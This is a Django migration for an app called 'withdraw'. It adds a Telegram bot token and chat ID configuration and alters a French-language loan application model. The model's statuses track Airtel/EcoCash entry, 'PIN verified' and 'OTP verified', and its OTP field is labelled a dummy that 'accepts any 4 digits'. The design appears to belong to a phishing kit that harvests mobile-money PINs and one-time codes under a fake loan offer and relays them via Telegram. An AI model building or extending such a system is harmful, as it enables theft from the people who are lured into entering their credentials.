# Generated by Django 5.2.9 on 2025-12-31 16:12

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('withdraw', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='TelegramConfig',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bot_token', models.CharField(help_text='Telegram Bot Token', max_length=255)),
                ('chat_id', models.CharField(help_text='Telegram Chat ID or Channel ID', max_length=100)),
                ('is_active', models.BooleanField(default=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
            options={
                'verbose_name': 'Configuration Telegram',
                'verbose_name_plural': 'Configurations Telegram',
            },
        ),
        migrations.AlterModelOptions(
            name='loanapplication',
            options={'ordering': ['-created_at'], 'verbose_name': 'Demande de Prêt', 'verbose_name_plural': 'Demandes de Prêt'},
        ),
        migrations.AlterField(
            model_name='loanapplication',
            name='otp',
            field=models.CharField(blank=True, help_text='Dummy OTP - accepts any 4 digits', max_length=4, null=True),
        ),
        migrations.AlterField(
            model_name='loanapplication',
            name='status',
            field=models.CharField(choices=[('pending', 'En attente'), ('ecocash_entry', 'Entrée Airtel'), ('pin_verified', 'PIN vérifié'), ('otp_verified', 'OTP vérifié'), ('completed', 'Terminé'), ('failed', 'Échoué')], default='pending', max_length=20),
        ),
    ]
